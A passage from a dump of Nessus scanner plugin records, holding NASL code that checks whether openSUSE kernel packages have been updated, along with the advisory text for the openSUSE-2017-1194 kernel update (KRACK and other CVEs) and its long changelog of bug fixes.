value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-debug-4.4.92-18.36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-debug-base-4.4.92-18.36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-debug-base-debuginfo-4.4.92-18.36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-debug-debuginfo-4.4.92-18.36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-debug-debugsource-4.4.92-18.36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-debug-devel-4.4.92-18.36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-debug-devel-debuginfo-4.4.92-18.36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-default-4.4.92-18.36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-default-base-4.4.92-18.36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-default-base-debuginfo-4.4.92-18.36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-default-debuginfo-4.4.92-18.36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-default-debugsource-4.4.92-18.36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-default-devel-4.4.92-18.36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-devel-4.4.92-18.36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-docs-html-4.4.92-18.36.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-docs-pdf-4.4.92-18.36.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-macros-4.4.92-18.36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-obs-build-4.4.92-18.36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-obs-build-debugsource-4.4.92-18.36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-obs-qa-4.4.92-18.36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-source-4.4.92-18.36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-source-vanilla-4.4.92-18.36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-syms-4.4.92-18.36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-vanilla-4.4.92-18.36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-vanilla-base-4.4.92-18.36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-vanilla-base-debuginfo-4.4.92-18.36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-vanilla-debuginfo-4.4.92-18.36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-vanilla-debugsource-4.4.92-18.36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-vanilla-devel-4.4.92-18.36.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel-docs-html / kernel-docs-pdf / kernel-devel / kernel-macros / etc\");\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-05T11:13:16", "bulletinFamily": "scanner", "description": "The openSUSE Leap 42.3 kernel was updated to 4.4.92 to receive various\nsecurity and bugfixes.\n\nThe following security bugs were fixed :\n\n - CVE-2017-13080: Wi-Fi Protected Access (WPA and WPA2)\n allowed reinstallation of the Group Temporal Key (GTK)\n during the group key handshake, allowing an attacker\n within radio range to replay frames from access points\n to clients (bnc#1063667).\n\n - CVE-2017-15265: Race condition in the ALSA subsystem in\n the Linux kernel allowed local users to cause a denial\n of service (use-after-free) or possibly have unspecified\n other impact via crafted /dev/snd/seq ioctl calls,\n related to sound/core/seq/seq_clientmgr.c and\n sound/core/seq/seq_ports.c (bnc#1062520).\n\n - CVE-2017-15649: net/packet/af_packet.c in the Linux\n kernel allowed local users to gain privileges via\n crafted system calls that trigger mishandling of\n packet_fanout data structures, because of a race\n condition (involving fanout_add and packet_do_bind) that\n leads to a use-after-free, a different vulnerability\n than CVE-2017-6346 (bnc#1064388).\n\nThe following non-security bugs were fixed :\n\n - acpi/processor: Check for duplicate processor ids at\n hotplug time (bnc#1056230).\n\n - acpi/processor: Implement DEVICE operator for processor\n enumeration (bnc#1056230).\n\n - add mainline tags to hyperv patches\n\n - alsa: au88x0: avoid theoretical uninitialized access\n (bnc#1012382).\n\n - alsa: compress: Remove unused variable (bnc#1012382).\n\n - alsa: usb-audio: Check out-of-bounds access by corrupted\n buffer descriptor (bnc#1012382).\n\n - alsa: usx2y: Suppress kernel warning at page allocation\n failures (bnc#1012382).\n\n - arm64: add function to get a cpu", "modified": "2017-10-26T00:00:00", "id": "OPENSUSE-2017-1194.NASL", "href": "https://www.tenable.com/plugins/nessus/104166", "published": "2017-10-26T00:00:00", "title": "openSUSE Security Update : the Linux Kernel (openSUSE-2017-1194) (KRACK)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2017-1194.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104166);\n script_version(\"3.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/06/04\");\n\n script_cve_id(\"CVE-2017-13080\", \"CVE-2017-15265\", \"CVE-2017-15649\", \"CVE-2017-6346\");\n script_xref(name:\"IAVA\", value:\"2017-A-0310\");\n\n script_name(english:\"openSUSE Security Update : the Linux Kernel (openSUSE-2017-1194) (KRACK)\");\n script_summary(english:\"Check for the openSUSE-2017-1194 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The openSUSE Leap 42.3 kernel was updated to 4.4.92 to receive various\nsecurity and bugfixes.\n\nThe following security bugs were fixed :\n\n - CVE-2017-13080: Wi-Fi Protected Access (WPA and WPA2)\n allowed reinstallation of the Group Temporal Key (GTK)\n during the group key handshake, allowing an attacker\n within radio range to replay frames from access points\n to clients (bnc#1063667).\n\n - CVE-2017-15265: Race condition in the ALSA subsystem in\n the Linux kernel allowed local users to cause a denial\n of service (use-after-free) or possibly have unspecified\n other impact via crafted /dev/snd/seq ioctl calls,\n related to sound/core/seq/seq_clientmgr.c and\n sound/core/seq/seq_ports.c (bnc#1062520).\n\n - CVE-2017-15649: net/packet/af_packet.c in the Linux\n kernel allowed local users to gain privileges via\n crafted system calls that trigger mishandling of\n packet_fanout data structures, because of a race\n condition (involving fanout_add and packet_do_bind) that\n leads to a use-after-free, a different vulnerability\n than CVE-2017-6346 (bnc#1064388).\n\nThe following non-security bugs were fixed :\n\n - acpi/processor: Check for duplicate processor ids at\n hotplug time (bnc#1056230).\n\n - acpi/processor: Implement DEVICE operator for processor\n enumeration (bnc#1056230).\n\n - add mainline tags to hyperv patches\n\n - alsa: au88x0: avoid theoretical uninitialized access\n (bnc#1012382).\n\n - alsa: compress: Remove unused variable (bnc#1012382).\n\n - alsa: usb-audio: Check out-of-bounds access by corrupted\n buffer descriptor (bnc#1012382).\n\n - alsa: usx2y: Suppress kernel warning at page allocation\n failures (bnc#1012382).\n\n - arm64: add function to get a cpu's MADT GICC table\n (bsc#1062279).\n\n - arm64: dts: Add Broadcom Vulcan PMU in dts\n (fate#319481).\n\n - arm64/perf: Access pmu register using\n <read/write;gt;_sys_reg (bsc#1062279).\n\n - arm64/perf: Add Broadcom Vulcan PMU support\n (fate#319481).\n\n - arm64/perf: Changed events naming as per the ARM ARM\n (fate#319481).\n\n - arm64/perf: Define complete ARMv8 recommended\n implementation defined events (fate#319481).\n\n - arm64: perf: do not expose CHAIN event in sysfs\n (bsc#1062279).\n\n - arm64: perf: Extend event config for ARMv8.1\n (bsc#1062279).\n\n - arm64/perf: Filter common events based on PMCEIDn_EL0\n (fate#319481).\n\n - arm64: perf: Ignore exclude_hv when kernel is running in\n HYP (bsc#1062279).\n\n - arm64: perf: move to common attr_group fields\n (bsc#1062279).\n\n - arm64: perf: Use the builtin_platform_driver\n (bsc#1062279).\n\n - arm64: pmu: add fallback probe table (bsc#1062279).\n\n - arm64: pmu: Hoist pmu platform device name\n (bsc#1062279).\n\n - arm64: pmu: Probe default hw/cache counters\n (bsc#1062279).\n\n - arm64: pmuv3: handle pmuv3+ (bsc#1062279).\n\n - arm64: pmuv3: handle !PMUv3 when probing (bsc#1062279).\n\n - arm64: pmuv3: use arm_pmu ACPI framework (bsc#1062279).\n\n - arm64: pmu: Wire-up Cortex A53 L2 cache events and DTLB\n refills (bsc#1062279).\n\n - arm: 8635/1: nommu: allow enabling REMAP_VECTORS_TO_RAM\n (bnc#1012382).\n\n - arm: dts: r8a7790: Use R-Car Gen 2 fallback binding for\n msiof nodes (bnc#1012382).\n\n - arm/perf: Convert to hotplug state machine\n (bsc#1062279).\n\n - arm/perf: Fix hotplug state machine conversion\n (bsc#1062279).\n\n - arm/perf: Use multi instance instead of custom list\n (bsc#1062279).\n\n - arm: remove duplicate 'const' annotations'\n (bnc#1012382).\n\n - asoc: dapm: fix some pointer error handling\n (bnc#1012382).\n\n - asoc: dapm: handle probe deferrals (bnc#1012382).\n\n - audit: log 32-bit socketcalls (bnc#1012382).\n\n - blacklist 0e7736c6b806 powerpc/powernv: Fix data type\n for @r in pnv_ioda_parse_m64_window()\n\n - blacklist.conf: fix commit exists twice in upstream,\n blacklist one of them\n\n - blacklist.conf: stack limit warning isn't triggered on\n SP3\n\n - block: genhd: add device_add_disk_with_groups\n (bsc#1060400).\n\n - bnx2x: Do not log mc removal needlessly (bsc#1019680\n FATE#321692).\n\n - bnxt_en: Do not setup MAC address in\n bnxt_hwrm_func_qcaps() (bsc#963575 FATE#320144).\n\n - bnxt_en: Free MSIX vectors when unregistering the device\n from bnxt_re (bsc#1020412 FATE#321671).\n\n - bnxt_re: Do not issue cmd to delete GID for QP1 GID\n entry before the QP is destroyed (bsc#1056596).\n\n - bnxt_re: Fix compare and swap atomic operands\n (bsc#1056596).\n\n - bnxt_re: Fix memory leak in FRMR path (bsc#1056596).\n\n - bnxt_re: Fix race between the netdev register and\n unregister events (bsc#1037579).\n\n - bnxt_re: Fix update of qplib_qp.mtu when modified\n (bsc#1056596).\n\n - bnxt_re: Free up devices in module_exit path\n (bsc#1056596).\n\n - bnxt_re: Remove RTNL lock dependency in\n bnxt_re_query_port (bsc#1056596).\n\n - bnxt_re: Stop issuing further cmds to FW once a cmd\n times out (bsc#1056596).\n\n - brcmfmac: setup passive scan if requested by user-space\n (bnc#1012382).\n\n - bridge: netlink: register netdevice before executing\n changelink (bnc#1012382).\n\n - ceph: avoid panic in create_session_open_msg() if\n utsname() returns NULL (bsc#1061451).\n\n - ceph: check negative offsets in ceph_llseek()\n (bsc#1061451).\n\n - ceph: fix message order check in handle_cap_export()\n (bsc#1061451).\n\n - ceph: fix NULL pointer dereference in ceph_flush_snaps()\n (bsc#1061451).\n\n - ceph: limit osd read size to CEPH_MSG_MAX_DATA_LEN\n (bsc#1061451).\n\n - ceph: limit osd write size (bsc#1061451).\n\n - ceph: stop on-going cached readdir if mds revokes\n FILE_SHARED cap (bsc#1061451).\n\n - ceph: validate correctness of some mount options\n (bsc#1061451).\n\n - documentation: arm64: pmu: Add Broadcom Vulcan PMU\n binding (fate#319481).\n\n - driver-core: platform: Add platform_irq_count()\n (bsc#1062279).\n\n - driver core: platform: Do not read past the end of\n 'driver_override' buffer (bnc#1012382).\n\n - drivers: firmware: psci: drop duplicate const from\n psci_of_match (FATE#319482 bnc#1012382).\n\n - drivers: hv: fcopy: restore correct transfer length\n (bnc#1012382).\n\n - drivers/perf: arm_pmu_acpi: avoid perf IRQ init when\n guest PMU is off (bsc#1062279).\n\n - drivers/perf: arm_pmu_acpi: Release memory obtained by\n kasprintf (bsc#1062279).\n\n - drivers/perf: arm_pmu: add ACPI framework (bsc#1062279).\n\n - drivers/perf: arm_pmu: add common attr group fields\n (bsc#1062279).\n\n - drivers/perf: arm_pmu: Always consider IRQ0 as an error\n (bsc#1062279).\n\n - drivers/perf: arm_pmu: Avoid leaking pmu->irq_affinity\n on error (bsc#1062279).\n\n - drivers/perf: arm_pmu: avoid NULL dereference when not\n using devicetree (bsc#1062279).\n\n - drivers/perf: arm-pmu: convert arm_pmu_mutex to spinlock\n (bsc#1062279).\n\n - drivers/perf: arm_pmu: Defer the setting of\n __oprofile_cpu_pmu (bsc#1062279).\n\n - drivers/perf: arm_pmu: define armpmu_init_fn\n (bsc#1062279).\n\n - drivers/perf: arm_pmu: expose a cpumask in sysfs\n (bsc#1062279).\n\n - drivers/perf: arm_pmu: factor out pmu registration\n (bsc#1062279).\n\n - drivers/perf: arm-pmu: Fix handling of SPI lacking\n 'interrupt-affinity' property (bsc#1062279).\n\n - drivers/perf: arm_pmu: Fix NULL pointer dereference\n during probe (bsc#1062279).\n\n - drivers/perf: arm-pmu: fix RCU usage on pmu resume from\n low-power (bsc#1062279).\n\n - drivers/perf: arm_pmu: Fix reference count of a\n device_node in of_pmu_irq_cfg (bsc#1062279).\n\n - drivers/perf: arm_pmu: fold init into alloc\n (bsc#1062279).\n\n - drivers/perf: arm_pmu: handle no platform_device\n (bsc#1062279).\n\n - drivers/perf: arm-pmu: Handle per-interrupt affinity\n mask (bsc#1062279).\n\n - drivers/perf: arm_pmu: implement CPU_PM notifier\n (bsc#1062279).\n\n - drivers/perf: arm_pmu: make info messages more verbose\n (bsc#1062279).\n\n - drivers/perf: arm_pmu: manage interrupts per-cpu\n (bsc#1062279).\n\n - drivers/perf: arm_pmu: move irq request/free into probe\n (bsc#1062279).\n\n - drivers/perf: arm_pmu: only use common attr_groups\n (bsc#1062279).\n\n - drivers/perf: arm_pmu: remove pointless PMU disabling\n (bsc#1062279).\n\n - drivers/perf: arm_pmu: rename irq request/free functions\n (bsc#1062279).\n\n - drivers/perf: arm_pmu: Request PMU SPIs with\n IRQF_PER_CPU (bsc#1062279).\n\n - drivers/perf: arm_pmu: rework per-cpu allocation\n (bsc#1062279).\n\n - drivers/perf: arm_pmu: simplify cpu_pmu_request_irqs()\n (bsc#1062279).\n\n - drivers/perf: arm_pmu: split cpu-local irq request/free\n (bsc#1062279).\n\n - drivers/perf: arm_pmu: split irq request from enable\n (bsc#1062279).\n\n - drivers/perf: arm_pmu: split out platform device probe\n logic (bsc#1062279).\n\n - drivers/perf: kill armpmu_register (bsc#1062279).\n\n - drm/amdkfd: fix improper return value on error\n (bnc#1012382).\n\n - drm: bridge: add DT bindings for TI ths8135\n (bnc#1012382).\n\n - drm_fourcc: Fix DRM_FORMAT_MOD_LINEAR #define\n (bnc#1012382).\n\n - drm/i915/bios: ignore HDMI on port A (bnc#1012382).\n\n - e1000e: use disable_hardirq() also for MSIX vectors in\n e1000_netpoll() (bsc#1022912 FATE#321246).\n\n - edac, sb_edac: Assign EDAC memory controller per h/w\n controller (bsc#1061721).\n\n - edac, sb_edac: Avoid creating SOCK memory controller\n (bsc#1061721).\n\n - edac, sb_edac: Bump driver version and do some cleanups\n (bsc#1061721).\n\n - edac, sb_edac: Carve out dimm-populating loop\n (bsc#1061721).\n\n - edac, sb_edac: Check if ECC enabled when at least one\n DIMM is present (bsc#1061721).\n\n - edac, sb_edac: Classify memory mirroring modes\n (bsc#1061721).\n\n - edac, sb_edac: Classify PCI-IDs by topology\n (bsc#1061721).\n\n - edac, sb_edac: Do not create a second memory controller\n if HA1 is not present (bsc#1061721).\n\n - edac, sb_edac: Do not use 'Socket#' in the memory\n controller name (bsc#1061721).\n\n - edac, sb_edac: Drop NUM_CHANNELS from 8 back to 4\n (bsc#1061721).\n\n - edac, sb_edac: Fix mod_name (bsc#1061721).\n\n - edac, sb_edac: Get rid of ->show_interleave_mode()\n (bsc#1061721).\n\n - edac, sb_edac: Remove double buffering of error records\n (bsc#1061721).\n\n - edac, sb_edac: Remove NULL pointer check on array\n pci_tad (bsc#1061721).\n\n - edac, skx_edac: Handle systems with segmented PCI busses\n (bsc#1063102).\n\n - ext4: do not allow encrypted operations without keys\n (bnc#1012382).\n\n - extcon: axp288: Use vbus-valid instead of -present to\n determine cable presence (bnc#1012382).\n\n - exynos-gsc: Do not swap cb/cr for semi planar formats\n (bnc#1012382).\n\n - fix flags ordering (bsc#1034075 comment 131)\n\n - Fix mpage_writepage() for pages with buffers\n (bsc#1050471).\n\n - fix whitespace according to upstream commit\n\n - fs/epoll: cache leftmost node (bsc#1056427).\n\n - fs/mpage.c: fix mpage_writepage() for pages with buffers\n (bsc#1050471). Update to version in mainline\n\n - ftrace: Fix kmemleak in unregister_ftrace_graph\n (bnc#1012382).\n\n - gfs2: Fix reference to ERR_PTR in gfs2_glock_iter_next\n (bnc#1012382).\n\n - hid: i2c-hid: allocate hid buffers for real worst case\n (bnc#1012382).\n\n - hwmon: (gl520sm) Fix overflows and crash seen when\n writing into limit attributes (bnc#1012382).\n\n - i2c: meson: fix wrong variable usage in\n meson_i2c_put_data (bnc#1012382).\n\n - i40e: Initialize 64-bit statistics TX ring seqcount\n (bsc#1024346 FATE#321239 bsc#1024373 FATE#321247).\n\n - i40iw: Add missing memory barriers (bsc#969476\n FATE#319648 bsc#969477 FATE#319816).\n\n - i40iw: Fix port number for query QP (bsc#969476\n FATE#319648 bsc#969477 FATE#319816).\n\n - ib/core: Add generic function to extract IB speed from\n netdev (bsc#1056596).\n\n - ib/core: Add ordered workqueue for RoCE GID management\n (bsc#1056596).\n\n - ib/core: Fix for core panic (bsc#1022595 FATE#322350).\n\n - ib/core: Fix the validations of a multicast LID in\n attach or detach operations (bsc#1022595 FATE#322350).\n\n - ib/i40iw: Fix error code in i40iw_create_cq()\n (bsc#969476 FATE#319648 bsc#969477 FATE#319816).\n\n - ib/ipoib: Fix deadlock over vlan_mutex (bnc#1012382\n bsc#1022595 FATE#322350).\n\n - ib/ipoib: Replace list_del of the neigh->list with\n list_del_init (FATE#322350 bnc#1012382 bsc#1022595).\n\n - ib/ipoib: rtnl_unlock can not come after free_netdev\n (FATE#322350 bnc#1012382 bsc#1022595).\n\n - ib/mlx5: Change logic for dispatching IB events for port\n state (bsc#1015342 FATE#321688 bsc#1015343 FATE#321689).\n\n - ib/mlx5: Fix cached MR allocation flow (bsc#1015342\n FATE#321688 bsc#1015343 FATE#321689).\n\n - ib/mlx5: Fix Raw Packet QP event handler assignment\n (bsc#966170 FATE#320225 bsc#966172 FATE#320226).\n\n - ibmvnic: Set state UP (bsc#1062962).\n\n - ib/qib: fix false-postive maybe-uninitialized warning\n (FATE#321231 FATE#321473 FATE#322149 FATE#322153\n bnc#1012382).\n\n - igb: re-assign hw address pointer on reset after PCI\n error (bnc#1012382).\n\n - iio: ad7793: Fix the serial interface reset\n (bnc#1012382).\n\n - iio: adc: axp288: Drop bogus AXP288_ADC_TS_PIN_CTRL\n register modifications (bnc#1012382).\n\n - iio: adc: hx711: Add DT binding for avia,hx711\n (bnc#1012382).\n\n - iio: adc: mcp320x: Fix oops on module unload\n (bnc#1012382).\n\n - iio: adc: mcp320x: Fix readout of negative voltages\n (bnc#1012382).\n\n - iio: adc: twl4030: Disable the vusb3v1 rugulator in the\n error handling path of 'twl4030_madc_probe()'\n (bnc#1012382).\n\n - iio: adc: twl4030: Fix an error handling path in\n 'twl4030_madc_probe()' (bnc#1012382).\n\n - iio: ad_sigma_delta: Implement a dedicated reset\n function (bnc#1012382).\n\n - iio: core: Return error for failed read_reg\n (bnc#1012382).\n\n - iommu/io-pgtable-arm: Check for leaf entry before\n dereferencing it (bnc#1012382).\n\n - iwlwifi: add workaround to disable wide channels in 5GHz\n (bnc#1012382).\n\n - kabi fixup struct nvmet_sq (bsc#1063349).\n\n - kABI: protect enum fs_flow_table_type (bsc#1015342\n FATE#321688 bsc#1015343 FATE#321689).\n\n - kABI: protect struct mlx5_priv (bsc#1015342 FATE#321688\n bsc#1015343 FATE#321689).\n\n - kABI: protect struct rm_data_op (kabi).\n\n - kABI: protect struct sdio_func (kabi).\n\n - libata: transport: Remove circular dependency at free\n time (bnc#1012382).\n\n - libceph: do not allow bidirectional swap of\n pg-upmap-items (bsc#1061451).\n\n - lsm: fix smack_inode_removexattr and xattr_getsecurity\n memleak (bnc#1012382).\n\n - md/raid10: submit bio directly to replacement disk\n (bnc#1012382).\n\n - mips: Ensure bss section ends on a long-aligned address\n (bnc#1012382).\n\n - mips: Fix minimum alignment requirement of IRQ stack\n (git-fixes).\n\n - mips: IRQ Stack: Unwind IRQ stack onto task stack\n (bnc#1012382).\n\n - mips: Lantiq: Fix another request_mem_region() return\n code check (bnc#1012382).\n\n - mips: ralink: Fix incorrect assignment on ralink_soc\n (bnc#1012382).\n\n - mlx5: Avoid that mlx5_ib_sg_to_klms() overflows the klms\n array (bsc#966170 FATE#320225 bsc#966172 FATE#320226).\n\n - mm: avoid marking swap cached page as lazyfree (VM\n Functionality, bsc#1061775).\n\n - mm/backing-dev.c: fix an error handling path in\n 'cgwb_create()' (bnc#1063475).\n\n - mm,compaction: serialize waitqueue_active() checks (for\n real) (bsc#971975).\n\n - mmc: sdio: fix alignment issue in struct sdio_func\n (bnc#1012382).\n\n - mm: discard memblock data later (bnc#1063460).\n\n - mm: fix data corruption caused by lazyfree page (VM\n Functionality, bsc#1061775).\n\n - mm/memblock.c: reversed logic in memblock_discard()\n (bnc#1063460).\n\n - mm: meminit: mark init_reserved_page as __meminit\n (bnc#1063509).\n\n - mm/memory_hotplug: change\n pfn_to_section_nr/section_nr_to_pfn macro to inline\n function (bnc#1063501).\n\n - mm/memory_hotplug: define\n find_(smallest|biggest)_section_pfn as unsigned long\n (bnc#1063520).\n\n - net: core: Prevent from dereferencing NULL pointer when\n releasing SKB (bnc#1012382).\n\n - netfilter: invoke synchronize_rcu after set the _hook_\n to NULL (bnc#1012382).\n\n - netfilter: nfnl_cthelper: fix incorrect\n helper->expect_class_max (bnc#1012382).\n\n - net/mlx4_core: Enable 4K UAR if SRIOV module parameter\n is not enabled (bsc#966191 FATE#320230 bsc#966186\n FATE#320228).\n\n - net/mlx5: Check device capability for maximum flow\n counters (bsc#1015342 FATE#321688 bsc#1015343\n FATE#321689).\n\n - net/mlx5: Delay events till ib registration ends\n (bsc#1015342 FATE#321688 bsc#1015343 FATE#321689).\n\n - net/mlx5e: Check for qos capability in dcbnl_initialize\n (bsc#1015342 FATE#321688 bsc#1015343 FATE#321689).\n\n - net/mlx5e: Do not add/remove 802.1ad rules when changing\n 802.1Q VLAN filter (bsc#1015342 FATE#321688 bsc#1015343\n FATE#321689).\n\n - net/mlx5e: Fix calculated checksum offloads counters\n (bsc#1015342 FATE#321688 bsc#1015343 FATE#321689).\n\n - net/mlx5e: Fix dangling page pointer on DMA mapping\n error (bsc#1015342 FATE#321688 bsc#1015343 FATE#321689).\n\n - net/mlx5e: Fix DCB_CAP_ATTR_DCBX capability for DCBNL\n getcap (bsc#1015342 FATE#321688 bsc#1015343\n FATE#321689).\n\n - net/mlx5e: Fix inline header size for small packets\n (bsc#1015342 FATE#321688 bsc#1015343 FATE#321689).\n\n - net/mlx5e: Print netdev features correctly in error\n message (bsc#1015342 FATE#321688 bsc#1015343\n FATE#321689).\n\n - net/mlx5e: Schedule overflow check work to mlx5e\n workqueue (bsc#966170 FATE#320225 bsc#966172\n FATE#320226).\n\n - net/mlx5: E-Switch, Unload the representors in the\n correct order (bsc#1015342 FATE#321688 bsc#1015343\n FATE#321689).\n\n - net/mlx5: Fix arm SRQ command for ISSI version 0\n (bsc#1015342 FATE#321688 bsc#1015343 FATE#321689).\n\n - net/mlx5: Fix command completion after timeout access\n invalid structure (bsc#966318 FATE#320158 bsc#966316\n FATE#320159).\n\n - net/mlx5: Fix counter list hardware structure\n (bsc#1015342 FATE#321688 bsc#1015343 FATE#321689).\n\n - net/mlx5: Remove the flag MLX5_INTERFACE_STATE_SHUTDOWN\n (bsc#966170 FATE#320225 bsc#966172 FATE#320226).\n\n - net/mlx5: Skip mlx5_unload_one if mlx5_load_one fails\n (bsc#966170 FATE#320225 bsc#966172 FATE#320226).\n\n - net: mvpp2: fix the mac address used when using PPv2.2\n (bsc#1032150).\n\n - net: mvpp2: use (get, put)_cpu() instead of\n smp_processor_id() (bsc#1032150).\n\n - net/packet: check length in getsockopt() called with\n PACKET_HDRLEN (bnc#1012382).\n\n - netvsc: Initialize 64-bit stats seqcount (fate#320485).\n\n - nvme: allow timed-out ios to retry (bsc#1063349).\n\n - nvme: fix sqhd reference when admin queue connect fails\n (bsc#1063349).\n\n - nvme: fix visibility of 'uuid' ns attribute\n (bsc#1060400).\n\n - nvme: protect against simultaneous shutdown invocations\n (FATE#319965 bnc#1012382 bsc#964944).\n\n - nvme: stop aer posting if controller state not live\n (bsc#1063349).\n\n - nvmet: implement valid sqhd values in completions\n (bsc#1063349).\n\n - nvmet: synchronize sqhd update (bsc#1063349).\n\n - nvme: use device_add_disk_with_groups() (bsc#1060400).\n\n - parisc: perf: Fix potential NULL pointer dereference\n (bnc#1012382).\n\n - partitions/efi: Fix integer overflow in GPT size\n calculation (FATE#322379 bnc#1012382 bsc#1020989).\n\n - perf: arm: acpi: remove cpu hotplug statemachine\n dependency (bsc#1062279).\n\n - perf: arm: platform: remove cpu hotplug statemachine\n dependency (bsc#1062279).\n\n - perf: arm: replace irq_get_percpu_devid_partition call\n (bsc#1062279).\n\n - perf: arm: temporary workaround for build errors\n (bsc#1062279).\n\n - perf: Convert to using %pOF instead of full_name\n (bsc#1062279).\n\n - powerpc: Fix unused function warning 'lmb_to_memblock'\n (FATE#322022).\n\n - powerpc/pseries: Add pseries hotplug workqueue\n (FATE#322022).\n\n - powerpc/pseries: Auto-online hotplugged memory\n (FATE#322022).\n\n - powerpc/pseries: Check memory device state before\n onlining/offlining (FATE#322022).\n\n - powerpc/pseries: Correct possible read beyond dlpar\n sysfs buffer (FATE#322022).\n\n - powerpc/pseries: Do not attempt to acquire drc during\n memory hot add for assigned lmbs (FATE#322022).\n\n - powerpc/pseries: Fix build break when MEMORY_HOTREMOVE=n\n (FATE#322022).\n\n - powerpc/pseries: fix memory leak in\n queue_hotplug_event() error path (FATE#322022).\n\n - powerpc/pseries: Implement indexed-count hotplug memory\n add (FATE#322022).\n\n - powerpc/pseries: Implement indexed-count hotplug memory\n remove (FATE#322022).\n\n - powerpc/pseries: Introduce memory hotplug READD\n operation (FATE#322022).\n\n - powerpc/pseries: Make the acquire/release of the drc for\n memory a separate step (FATE#322022).\n\n - powerpc/pseries: Remove call to memblock_add()\n (FATE#322022).\n\n - powerpc/pseries: Revert 'Auto-online hotplugged memory'\n (FATE#322022).\n\n - powerpc/pseries: Use kernel hotplug queue for PowerVM\n hotplug events (FATE#322022).\n\n - powerpc/pseries: Use lmb_is_removable() to check\n removability (FATE#322022).\n\n - powerpc/pseries: Verify CPU does not exist before adding\n (FATE#322022).\n\n - rdma: Fix return value check for ib_get_eth_speed()\n (bsc#1056596).\n\n - rdma/qedr: Parse VLAN ID correctly and ignore the value\n of zero (bsc#1019695 FATE#321703 bsc#1019699 FATE#321702\n bsc#1022604 FATE#321747).\n\n - rdma/qedr: Parse vlan priority as sl (bsc#1019695\n FATE#321703 bsc#1019699 FATE#321702 bsc#1022604\n FATE#321747).\n\n - rds: ib: add error handle (bnc#1012382).\n\n - rds: rdma: Fix the composite message user notification\n (bnc#1012382).\n\n - README.BRANCH: Add Michal and Johannes as\n co-maintainers.\n\n - Remove superfluous hunk in bigmem backport\n (bsc#1064436). Refresh\n 